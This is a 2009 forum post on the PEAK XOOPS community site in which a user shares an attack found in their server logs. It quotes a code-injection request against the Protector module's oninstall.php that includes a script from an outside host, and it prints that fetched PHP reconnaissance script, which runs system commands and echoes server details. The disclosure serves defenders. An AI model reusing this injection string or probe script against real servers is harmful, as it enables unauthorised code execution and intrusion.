PEAK XOOPS - see my logs.. in englishin japanese

see my logs..

List posts in the topic

none see my logs..

msg# 1
depth:
0
Previous post - Next post | Parent - Children.1 .2 .3 | Posted on 2009/5/17 17:03
minimum  二等兵   Posts: 10
Look, what I found by reviewing the log last month
/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}include($_GET[a]);function v&a=http://community.creativity.edu.tw/uploads/idomila.txt??

and the file they want to run contains

<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}

return sprintf("%0.2f Gb", $number/1024/1024/1024);

}
echo "Pandega<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "Pandega was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
?>
Votes:10 Average:8.00

Posts tree

  Advanced search


Login
Username or e-mail:

Password:

Remember Me

Lost Password?

Register now!